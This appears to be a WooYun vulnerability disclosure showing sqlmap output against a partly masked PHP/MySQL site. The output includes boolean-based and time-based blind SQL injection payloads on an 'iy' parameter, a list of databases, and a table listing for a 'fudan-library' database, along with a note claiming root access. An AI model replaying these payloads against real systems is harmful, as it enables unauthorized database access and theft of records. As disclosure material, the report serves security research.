WooYun.org

http://**.**.**.**/0529/query.php?iy=1905&p=1
Parameter: iy (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: iy=1905 AND 7982=7982&p=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: iy=1905 AND (SELECT * FROM (SELECT(SLEEP(5)))Qglq)&p=1
---
web application technology: Apache, PHP 5.2.13
back-end DBMS: MySQL >= 5.0.0
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: iy (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: iy=1905 AND 7982=7982&p=1
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: iy=1905 AND (SELECT * FROM (SELECT(SLEEP(5)))Qglq)&p=1
---
web application technology: Apache, PHP 5.2.13
back-end DBMS: MySQL >= 5.0.0
available databases [7]:
[*] `fudan-library`
[*] card2011
[*] club
[*] happywoods1
[*] information_schema
[*] mysql
[*] test
Database: fudan-library
[43 tables]
+----------------------+
| access_log |
| account_info |
| apply_user_info |
| bank_account_mst |
| batch_mst |
| business_info |
| carddav_addressbooks |
| carddav_cards |
| carddav_groupmembers |
| carddav_principals |
| carddav_users |
| company_info |
| company_system |
| config_mst |
| contents_info |
| currency_type_mst |
| employee_info |
| estimate_info |
| festival_mst |
| file_upload_info |
| leave_info |
| library_card_info |
| library_info |
| mail_send_info |
| mail_send_log |
| mail_template_mst |
| maintenance_info |
| operation_mst |
| option_mst |
| option_type_mst |
| order_info |
| overtime_info |
| permission_mst |
| process_log_info |
| product_info |
| role_mst |
| scheduled_info |
| sequence_mst |
| sms_log |
| status_mst |
| unit_mst |
| user_info |
| zip_mst |
+----------------------+
root权限，读下config文件看看(已打码)

不做深入测试